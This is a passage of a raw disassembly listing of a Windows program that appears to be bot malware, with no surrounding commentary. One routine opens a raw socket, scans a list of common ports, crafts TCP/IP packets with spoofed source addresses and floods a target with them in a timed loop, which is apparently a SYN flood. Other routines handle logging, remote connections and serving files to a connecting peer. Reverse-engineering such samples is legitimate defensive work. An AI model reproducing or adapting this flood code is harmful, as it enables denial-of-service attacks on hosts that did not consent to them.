sub_4156D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157BA proc near ; CODE XREF: sub_41561D+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
push 1
pop eax
xor ebx, ebx
push eax
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+var_14], eax
call ds:dword_4271C4 ; WSASocketA
lea ecx, [ebp+var_14]
push 4
push ecx
push 2
push ebx
push eax
mov dword_4CF1F0, eax
call dword_4CB9B4 ; setsockopt
mov esi, ds:dword_4270B0
call esi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+var_100]
pop ecx
mov [ebp+var_10C], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_108], ebx
mov [ebp+var_104], ebx
mov [ebp+var_8C], 401h
mov [ebp+var_88], 15h
mov [ebp+var_84], 16h
mov [ebp+var_80], 17h
mov [ebp+var_78], 35h
mov [ebp+var_74], 50h
mov [ebp+var_70], 51h
mov [ebp+var_6C], 58h
mov [ebp+var_68], 6Eh
mov [ebp+var_64], 71h
mov [ebp+var_60], 77h
mov [ebp+var_5C], 87h
mov [ebp+var_58], 89h
mov [ebp+var_54], 8Bh
mov [ebp+var_50], 8Fh
mov [ebp+var_4C], 1BBh
mov [ebp+var_48], 1BDh
mov [ebp+var_44], 400h
mov [ebp+var_40], 599h
mov [ebp+var_3C], 5DCh
mov [ebp+var_38], 6B8h
mov [ebp+var_34], 0CEAh
mov [ebp+var_30], 0D3Dh
mov [ebp+var_2C], 1388h
mov [ebp+var_28], 1A0Bh
mov [ebp+var_24], 1F40h
mov [ebp+var_20], 1F90h
rep stosd
mov [ebp+var_10], ebx
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], ebx
loc_415900: ; CODE XREF: sub_4157BA+1C1�j
mov eax, [ebp+arg_0]
mov [ebp+var_9C], 2
mov [ebp+var_98], eax
mov eax, [ebp+var_4]
lea edi, [ebp+eax+var_8C]
mov ax, word ptr [ebp+eax+var_8C]
push eax
call dword_4CB9D4 ; htons
push ebx
push 1
push 2
mov [ebp+var_9A], ax
call dword_4CBA54 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_C], eax
push ecx
lea ecx, [ebp+var_9C]
push 10h
push ecx
push eax
call sub_4156D1
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call dword_4CBA6C ; closesocket
cmp [ebp+var_8], ebx
jnz short loc_415973
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_10C], eax
loc_415973: ; CODE XREF: sub_4157BA+1AB�j
add [ebp+var_4], 4
cmp [ebp+var_4], 70h
jl short loc_415900
mov edi, offset dword_4CF1F4
push offset asc_42CDC0 ; " "
push edi
call sub_41C266
pop ecx
pop ecx
call esi ; GetTickCount
mov [ebp+var_C], eax
lea eax, [ebp+var_10C]
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
loc_4159A0: ; CODE XREF: sub_4157BA+23C�j
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_4159F8
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, ebx
jz short loc_4159D1
push eax
push edi
push offset aSD ; "%s%d "
push edi
mov [ebp+var_10], eax
call sub_41C266
add esp, 10h
jmp short loc_4159EB
; ---------------------------------------------------------------------------
loc_4159D1: ; CODE XREF: sub_4157BA+200�j
push 0FFFFh
push ebx
call sub_418BD1
pop ecx
pop ecx
push eax
call dword_4CB9D4 ; htons
movzx eax, ax
mov [ebp+var_10], eax
loc_4159EB: ; CODE XREF: sub_4157BA+215�j
inc [ebp+var_4]
add [ebp+var_8], 4
cmp [ebp+var_4], 1Ch
jl short loc_4159A0
loc_4159F8: ; CODE XREF: sub_4157BA+1F7�j
; sub_4157BA+477�j
push 28h
push ebx
push offset byte_4CF190
call sub_41BF70
mov esi, 0FFFFh
mov byte_4CF190, 45h
push esi
push 400h
mov byte_4CF199, 6
mov byte_4CF191, 8
call sub_418BD1
add esp, 14h
push eax
call dword_4CB9D4 ; htons
push 28h
mov word_4CF194, ax
call dword_4CB9D4 ; htons
or byte_4CF198, 0FFh
cmp dword_4CF180, ebx
mov word_4CF192, ax
mov word_4CF196, bx
jnz short loc_415A78
push 0FFFEh
push 1
call sub_418BD1
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
shl eax, 10h
and ecx, esi
or eax, ecx
jmp short loc_415A83
; ---------------------------------------------------------------------------
loc_415A78: ; CODE XREF: sub_4157BA+2A2�j
push offset dword_4CEB60
call dword_4CBA14 ; inet_addr
loc_415A83: ; CODE XREF: sub_4157BA+2BC�j
mov dword_4CF19C, eax
mov eax, [ebp+arg_0]
push 4000h
mov dword_4CF1A0, eax
mov byte_4CF1B1, bl
call dword_4CB9D4 ; htons
push esi
push ebx
mov word_4CF1B2, ax
call sub_418BD1
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_418BD1
add esp, 10h
add edi, eax
push edi
call dword_4CB9D0 ; htonl
mov dword_4CF1A8, eax
mov al, byte_4CF1B0
mov edi, [ebp+arg_0]
and al, 0Fh
or al, 50h
push 14h
mov byte_4CF1B0, al
mov ax, word ptr [ebp+var_10]
mov dword_4CF1AC, ebx
mov word_4CF1B6, bx
mov word_4CF1A6, ax
mov dword_4CF1CC, edi
mov byte_4CF1D0, bl
mov byte_4CF1D1, 6
call dword_4CB9D4 ; htons
mov word_4CF1D2, ax
mov ax, word_4CF1A6
mov word_4CF1B8, 2
mov dword_4CF1BC, edi
mov word_4CF1BA, ax
mov [ebp+var_4], ebx
jmp short loc_415B39
; ---------------------------------------------------------------------------
loc_415B34: ; CODE XREF: sub_4157BA+451�j
mov esi, 0FFFFh
loc_415B39: ; CODE XREF: sub_4157BA+378�j
cmp [ebp+var_4], ebx
jnz short loc_415B6D
push esi
push ebx
call sub_418BD1
pop ecx
pop ecx
push eax
call dword_4CB9D4 ; htons
mov word_4CF1A4, ax
mov eax, dword_4CF19C
mov dword_4CF1C8, eax
mov byte_4CF1B1, 2
mov dword_4CF1AC, ebx
jmp short loc_415B8C
; ---------------------------------------------------------------------------
loc_415B6D: ; CODE XREF: sub_4157BA+382�j
push esi
push ebx
mov byte_4CF1B1, 10h
call sub_418BD1
pop ecx
pop ecx
push eax
call dword_4CB9D4 ; htons
movzx eax, ax
mov dword_4CF1AC, eax
loc_415B8C: ; CODE XREF: sub_4157BA+3B1�j
inc word_4CF194
inc dword_4CF1A8
mov ax, word_4CF1A6
push 5
pop ecx
mov esi, offset word_4CF1A4
mov edi, offset dword_4CF1D4
mov word_4CF19A, bx
mov word_4CF1B4, bx
push 14h
rep movsd
mov esi, offset byte_4CF190
mov word_4CF1BA, ax
push esi
call sub_40AA5F
push 20h
push offset dword_4CF1C8
mov word_4CF19A, ax
call sub_40AA5F
add esp, 10h
mov word_4CF1B4, ax
push 10h
push offset word_4CF1B8
push ebx
push 28h
push esi
push dword_4CF1F0
call dword_4CBA38 ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_415B34
call ds:dword_4270B0 ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_415C36
push [ebp+arg_8]
call ds:dword_427080 ; Sleep
jmp loc_4159F8
; ---------------------------------------------------------------------------
loc_415C36: ; CODE XREF: sub_4157BA+46C�j
pop edi
pop esi
mov eax, offset dword_4CF1F4
pop ebx
leave
retn
sub_4157BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C40 proc near ; CODE XREF: sub_401ACD+7111�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_43DB90
mov edi, 0B8h
loc_415C54: ; CODE XREF: sub_415C40+33�j
cmp byte ptr [esi], 0
jz short loc_415C77
push [ebp+arg_0]
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_415C77
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_43E710
jl short loc_415C54
jmp short loc_415CB9
; ---------------------------------------------------------------------------
loc_415C77: ; CODE XREF: sub_415C40+17�j
; sub_415C40+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_43DB90[esi]
push ebx
call sub_41BF70
push 17h
push [ebp+arg_0]
push ebx
call sub_41BFD0
push 9Fh
lea eax, dword_43DBA8[esi]
push [ebp+arg_4]
push eax
call sub_41BFD0
add esp, 24h
inc dword_4294CC
pop ebx
loc_415CB9: ; CODE XREF: sub_415C40+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_415C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415CC0 proc near ; CODE XREF: sub_401ACD+289A�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_437EF0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
xor edi, edi
mov esi, offset dword_43DB90
loc_415CEA: ; CODE XREF: sub_415CC0+72�j
cmp byte ptr [esi], 0
jz short loc_415D25
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_437EDC
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41C360
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 2Ch
loc_415D25: ; CODE XREF: sub_415CC0+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_43E710
jl short loc_415CEA
pop edi
pop esi
leave
retn
sub_415CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D38 proc near ; CODE XREF: sub_401221+384�p
; sub_401221+408�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_427140 ; GetLocalTime
mov ebx, offset dword_4D35F4
mov edi, 80h
mov esi, offset dword_4CF5F4
loc_415D5A: ; CODE XREF: sub_415D38+3D�j
cmp byte ptr [ebx], 0
jz short loc_415D71
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_41BFD0
add esp, 0Ch
loc_415D71: ; CODE XREF: sub_415D38+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_415D5A
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_41C360
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_415D38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DAC proc near ; CODE XREF: sub_4017ED+F7�p
; sub_401ACD:loc_408967�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_41CB70
lea eax, [ebp+var_80]
push eax
call sub_415D38
add esp, 14h
leave
retn
sub_415DAC endp
; =============== S U B R O U T I N E =======================================
sub_415DD8 proc near ; CODE XREF: sub_401ACD+278E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_4CF5F4
xor ecx, ecx
loc_415DDF: ; CODE XREF: sub_415DD8+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_4D35F4
jl short loc_415DDF
cmp [esp+arg_C], ecx
jnz short loc_415E0D
push ecx
push [esp+4+arg_8]
push offset dword_437F3C
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_409869
add esp, 14h
loc_415E0D: ; CODE XREF: sub_415DD8+19�j
push offset dword_437F28
call sub_415D38
pop ecx
retn
sub_415DD8 endp
; =============== S U B R O U T I N E =======================================
sub_415E19 proc near ; CODE XREF: .text:0040E1FF�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_4CF5F4
loc_415E1F: ; CODE XREF: sub_415E19+27�j
cmp byte ptr [esi], 0
jz short loc_415E34
push [esp+4+arg_0]
push esi
call sub_4185D3
pop ecx
test eax, eax
pop ecx
jnz short loc_415E46
loc_415E34: ; CODE XREF: sub_415E19+9�j
add esi, 80h
cmp esi, offset dword_4D35F4
jl short loc_415E1F
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415E46: ; CODE XREF: sub_415E19+19�j
push 1
pop eax
pop esi
retn
sub_415E19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E4B proc near ; DATA XREF: sub_401ACD+2844�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_415E9E
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_437F6C
push eax
push [ebp+var_11C]
call sub_409869
add esp, 14h
loc_415E9E: ; CODE XREF: sub_415E4B+33�j
cmp [ebp+var_98], 0
jz short loc_415EBE
lea eax, [ebp+var_98]
push eax
call sub_41C159
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_415EBE
mov [ebp+var_8], eax
loc_415EBE: ; CODE XREF: sub_415E4B+5A�j
; sub_415E4B+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_4CF5F4
loc_415EC7: ; CODE XREF: sub_415E4B+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_415F21
cmp byte ptr [esi], 0
jz short loc_415F10
cmp [ebp+var_98], 0
jz short loc_415EF6
cmp [ebp+var_4], 0
jnz short loc_415EF6
lea eax, [ebp+var_98]
push eax
push esi
call sub_4185D3
pop ecx
test eax, eax
pop ecx
jz short loc_415F10
loc_415EF6: ; CODE XREF: sub_415E4B+90�j
; sub_415E4B+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_409869
add esp, 14h
loc_415F10: ; CODE XREF: sub_415E4B+87�j
; sub_415E4B+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_4D35F4
jl short loc_415EC7
loc_415F21: ; CODE XREF: sub_415E4B+82�j
lea eax, [ebp+var_31C]
push offset dword_437F50
push eax
call sub_41C266
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_415F5B
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_409869
add esp, 14h
loc_415F5B: ; CODE XREF: sub_415E4B+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_415D38
push [ebp+var_18]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_415E4B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F7A proc near ; CODE XREF: sub_416000+33�p
; sub_416563+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4CBA54 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_415FF6
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_4CB9D4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4CBA14 ; inet_addr
cmp eax, esi
jnz short loc_415FDB
push [ebp+arg_0]
call dword_4CBA58 ; gethostbyname
test eax, eax
jz short loc_415FF6
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_415FDB: ; CODE XREF: sub_415F7A+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, esi
jnz short loc_415FFA
push edi
call dword_4CBA6C ; closesocket
loc_415FF6: ; CODE XREF: sub_415F7A+1B�j
; sub_415F7A+58�j
mov eax, esi
jmp short loc_415FFC
; ---------------------------------------------------------------------------
loc_415FFA: ; CODE XREF: sub_415F7A+73�j
mov eax, edi
loc_415FFC: ; CODE XREF: sub_415F7A+7E�j
pop edi
pop esi
leave
retn
sub_415F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416000 proc near ; DATA XREF: sub_401ACD+A02�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_415F7A
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_416093
lea eax, [ebp+var_11B4]
push offset unk_437FEC
push eax
call sub_41C266
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_416076
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409869
add esp, 14h
loc_416076: ; CODE XREF: sub_416000+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_416093: ; CODE XREF: sub_416000+3F�j
push offset byte_43DB88
push ebx
call sub_41A1B1
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4160FE
lea eax, [ebp+var_11B4]
push offset unk_437FBC
push eax
call sub_41C266
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_4160DA
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409869
add esp, 14h
loc_4160DA: ; CODE XREF: sub_416000+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_415D38
pop ecx
push ebx
call dword_4CBA6C ; closesocket
push [ebp+var_10]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_4160FE: ; CODE XREF: sub_416000+A3�j
push 64h
call ds:dword_427080 ; Sleep
xor edi, edi
mov esi, 1000h
loc_41610D: ; CODE XREF: sub_416000+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call dword_4CB9EC ; recv
test eax, eax
jle short loc_41616A
lea eax, [ebp+var_11B4]
push offset asc_42A080 ; "\n"
push eax
call sub_41C8A0
lea eax, [ebp+var_11B4]
push eax
call sub_419F9D
add esp, 0Ch
test eax, eax
jz short loc_41616A
push 64h
call ds:dword_427080 ; Sleep
push 0Ah
call sub_40B602
test eax, eax
pop ecx
jnz short loc_41610D
loc_41616A: ; CODE XREF: sub_416000+130�j
; sub_416000+154�j
lea eax, [ebp+var_11B4]
push offset unk_437F88
push eax
call sub_41C266
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_41619D
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409869
add esp, 14h
loc_41619D: ; CODE XREF: sub_416000+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_415D38
pop ecx
push ebx
call dword_4CBA6C ; closesocket
push [ebp+var_10]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
sub_416000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4161C1 proc near ; DATA XREF: sub_401ACD+7696�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_41620F
push offset unk_4380EC
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_41620F: ; CODE XREF: sub_4161C1+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call dword_4CB9D4 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_4CBA00 ; bind
test eax, eax
jz short loc_41624D
push offset unk_4380C8
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_41624D: ; CODE XREF: sub_4161C1+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call dword_4CB978 ; getsockname
push [ebp+var_2E]
call dword_4CB904 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_41B9C0
pop ecx
loc_41627F: ; CODE XREF: sub_4161C1+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_416292
push 5Fh
pop eax
jmp short loc_416295
; ---------------------------------------------------------------------------
loc_416292: ; CODE XREF: sub_4161C1+CA�j
movsx eax, al
loc_416295: ; CODE XREF: sub_4161C1+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_41B9C0
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_41627F
push ebx
push edi
call dword_4CB9FC ; listen
test eax, eax
jz short loc_4162C8
push offset unk_437FEC
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_4162C8: ; CODE XREF: sub_4161C1+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_4162F2
push offset unk_4380A8
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_4162F2: ; CODE XREF: sub_4161C1+125�j
push esi
push eax
call ds:dword_427114 ; GetFileSize
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
push eax
call dword_4CB9D0 ; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_438090
push eax
call sub_41C266
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_409869
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_4CB9BC ; select
test eax, eax
jg short loc_4163A2
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_438078
push eax
push [ebp+var_1FC]
call sub_409869
jmp loc_4164C6
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_4161C1+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_4163DB
push offset unk_438054
loc_4163C8: ; CODE XREF: sub_4161C1+49�j
; sub_4161C1+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_41C266
pop ecx
pop ecx
jmp loc_4164C9
; ---------------------------------------------------------------------------
loc_4163DB: ; CODE XREF: sub_4161C1+200�j
push edi
call dword_4CBA6C ; closesocket
cmp [ebp+arg_0], esi
jz loc_41648D
mov edi, 400h
loc_4163F0: ; CODE XREF: sub_4161C1+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_4163FD
mov [ebp+var_4], eax
loc_4163FD: ; CODE XREF: sub_4161C1+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_41BF70
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:dword_427128 ; SetFilePointer
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:dword_4270EC ; ReadFile
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_4CBA24 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_4CB9EC ; recv
cmp eax, ebx
jl loc_416522
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_416522
sub [ebp+arg_0], eax
jnz loc_4163F0
mov edi, [ebp+var_18]
loc_41648D: ; CODE XREF: sub_4161C1+224�j
push [ebp+var_8]
call ds:dword_427070 ; CloseHandle
push [ebp+var_C]
push [ebp+var_10]
call sub_416CC9
pop ecx
pop ecx
push eax
push [ebp+var_44]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset unk_438028
push eax
call sub_41C266
loc_4164C6: ; CODE XREF: sub_4161C1+1DC�j
add esp, 14h
loc_4164C9: ; CODE XREF: sub_4161C1+215�j
cmp [ebp+var_50], esi
jnz short loc_4164EE
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_409869
add esp, 14h
loc_4164EE: ; CODE XREF: sub_4161C1+30B�j
lea eax, [ebp+var_3FC]
push eax
